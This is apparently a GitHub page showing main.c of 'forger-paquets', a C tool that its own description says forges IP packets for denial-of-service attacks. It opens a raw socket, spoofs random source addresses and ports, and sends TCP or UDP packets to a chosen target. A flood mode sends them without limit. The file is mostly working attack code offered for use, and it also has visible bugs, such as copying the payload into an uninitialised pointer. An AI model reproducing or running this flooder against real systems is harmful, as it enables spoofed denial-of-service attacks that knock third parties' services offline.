-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmain.c
276 lines (218 loc) · 8.33 KB
/
main.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/ip.h> // Déclarations entête IP
#include <netinet/tcp.h> // Déclarations entête TCP
#include <netinet/udp.h> // Déclarations entête UDP
#include <time.h> // rand()
#include <argp.h> // Traitement arguments et options
#include "traitementTCP.h"
#include "traitementUDP.h"
#include "randGen.h"
#include "checksum.h"
#include "pseudoHeader.h"
#include "stringIP.h"
const char *argp_program_version = "forger-paquets 0.1.0";
struct arguments {
char *args[3];
int verbose, flood; // -v -f
char *outfile; // -o
char *string1, *string2, *s_port, *s_ip, *count, *payload; // arguments pour -a -b -i -p -c -d
char *d_ip, *protocole; // adresse IP destination, spécifiée par l'utilisateur
unsigned short d_port; // port destination, spécifié par l'utilisateur
};
static struct argp_option options[] =
{
{"verbose", 'v', 0, 0, "Produire sortie verbeuse"},
{"sourceip", 'i', "S_IP", 0, "Spécifier l'adresse IP Source (Aléatoire si non spécifiée)"},
{"sourceport", 'p', "S_PORT", 0, "Spécifier le Port Source (Aléatoire si non spécifié)"},
{"output", 'o', "OUTFILE", 0, "Prendre OUTFILE comme sortie au lieu de la sortie standard"},
{"flood", 'f', 0, 0, "Envoi des paquets le plus vite possible jusqu'à interruption du programme"},
{"count", 'c', "COUNT", 0, "Spécifier le nombre de paquets à envoyer"},
{"payload", 'd', "PAYLOAD", 0, "Spécifier le champ DATA"},
{0}
};
// PARSER
static error_t
parse_opt (int key, char *arg, struct argp_state *state)
{
struct arguments *arguments = state->input;
switch (key)
{
case 'v':
arguments->verbose = 1;
break;
case 'i':
arguments->s_ip = arg;
break;
case 'p':
arguments->s_port = arg;
break;
case 'd':
arguments->payload = arg;
break;
case 'f':
arguments->flood = 1;
break;
case 'c':
arguments->count = arg;
break;
case 'o':
arguments->outfile = arg;
break;
case ARGP_KEY_ARG:
if (state->arg_num >= 3)
{
argp_usage(state);
}
arguments->args[state->arg_num] = arg;
break;
case ARGP_KEY_END:
if (state->arg_num < 3)
{
argp_usage (state);
}
break;
default:
return ARGP_ERR_UNKNOWN;
}
return 0;
}
// ARGS_DOC
static char args_doc[] = "PROTOCOLE IP_DESTINATION PORT_DESTINATION";
// DOC
static char doc[] = "forger-paquets -- Un programme pour forger des paquets IP et mettre en oeuvre des attaques de déni de service.";
// ARGP STRUCTURE
static struct argp argp = {options, parse_opt, args_doc, doc};
int main (int argc, char **argv) {
srand(time(NULL));
struct arguments arguments;
FILE *outstream;
// ARGUMENTS PAR DÉFAUT
arguments.outfile = NULL;
arguments.verbose = 0;
arguments.s_ip = NULL;
arguments.s_port = NULL;
arguments.flood = 0;
arguments.count = NULL;
arguments.payload = NULL;
// PARSING ARGUMENTS
argp_parse(&argp, argc, argv, 0, 0, &arguments);
// RENVOI OUTPUT
if (arguments.outfile)
outstream = fopen(arguments.outfile, "w");
else
outstream = stdout;
// création du socket raw
int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
unsigned short source_port;
//représentation du paquet sous forme de datagramme
char datagram[1024], source_ip[32], *data;//, *pseudogram;
//initialiser le tampon à 0
memset(datagram, 0, sizeof(datagram));
//entete IP
//struct iphdr *iph = (struct iphdr *)datagram;
if (arguments.flood) {
while(1) { // vv mettre dans une fonction pour alléger vv
if (arguments.s_ip)
strcpy(source_ip, arguments.s_ip);
else
strcpy(source_ip, stringIP(rand()));
if (arguments.s_port)
source_port = atoi(arguments.s_port);
else
source_port = randGen(1024, 65535); //générer port destination aléatoire entre 1024 et 65535
if (arguments.payload)
strcpy(data, arguments.payload);
if(strcmp(arguments.args[0], "udp") == 0) {
traitementUDP(s, datagram, data, source_ip, arguments.args[1], source_port, atoi(arguments.args[2]));
}
else if(strcmp(arguments.args[0], "tcp") == 0) {
traitementTCP(s, datagram, data, source_ip, arguments.args[1], source_port, atoi(arguments.args[2]));
}
// VERBOSE OUTPUT
if (arguments.verbose) {
if(s < 0) {
perror("erreur socket(), essayez sudo.");
exit(1);
}
fprintf (outstream, "PROTOCOLE \t\t: %s\n"
"ADRESSE IP SOURCE \t: %s\n"
"PORT SOURCE \t\t: %d\n"
"ADRESSE IP DESTINATION \t: %s\n"
"PORT DESTINATION \t: %d\n\n",
arguments.args[0], source_ip, source_port, arguments.args[1], atoi(arguments.args[2]));
}
}
return 0;
}
else if (arguments.count) {
int i = 0;
for(i = 0; i<atoi(arguments.count); i++) { // vv mettre dans une fonction pour alléger vv
if (arguments.s_ip)
strcpy(source_ip, arguments.s_ip);
else
strcpy(source_ip, stringIP(rand()));
if (arguments.s_port)
source_port = atoi(arguments.s_port);
else
source_port = randGen(1024, 65535); //générer port destination aléatoire entre 1024 et 65535
if (arguments.payload)
strcpy(data, arguments.payload);
if(strcmp(arguments.args[0], "udp") == 0) {
traitementUDP(s, datagram, data, source_ip, arguments.args[1], source_port, atoi(arguments.args[2]));
}
else if(strcmp(arguments.args[0], "tcp") == 0) {
traitementTCP(s, datagram, data, source_ip, arguments.args[1], source_port, atoi(arguments.args[2]));
}
// VERBOSE OUTPUT
if (arguments.verbose) {
if(s < 0) {
perror("erreur socket(), essayez sudo.");
exit(1);
}
fprintf (outstream, "PROTOCOLE \t\t: %s\n"
"ADRESSE IP SOURCE \t: %s\n"
"PORT SOURCE \t\t: %d\n"
"ADRESSE IP DESTINATION \t: %s\n"
"PORT DESTINATION \t: %d\n\n",
arguments.args[0], source_ip, source_port, arguments.args[1], atoi(arguments.args[2]));
}
}
return 0;
}
else {
if (arguments.s_ip)
strcpy(source_ip, arguments.s_ip);
else
strcpy(source_ip, stringIP(rand()));
if (arguments.s_port)
source_port = atoi(arguments.s_port);
else
source_port = randGen(1024, 65535); //générer port destination aléatoire entre 1024 et 65535
if (arguments.payload)
strcpy(data, arguments.payload);
if(strcmp(arguments.args[0], "udp") == 0) {
traitementUDP(s, datagram, data, source_ip, arguments.args[1], source_port, atoi(arguments.args[2]));
}
else if(strcmp(arguments.args[0], "tcp") == 0) {
traitementTCP(s, datagram, data, source_ip, arguments.args[1], source_port, atoi(arguments.args[2]));
}
// VERBOSE OUTPUT
if (arguments.verbose) {
if(s < 0) {
perror("erreur socket(), essayez sudo.");
exit(1);
}
fprintf (outstream, "PROTOCOLE \t\t: %s\n"
"ADRESSE IP SOURCE \t: %s\n"
"PORT SOURCE \t\t: %d\n"
"ADRESSE IP DESTINATION \t: %s\n"
"PORT DESTINATION \t: %d\n\n",
arguments.args[0], source_ip, source_port, arguments.args[1], atoi(arguments.args[2]));
}
}
return 0;
}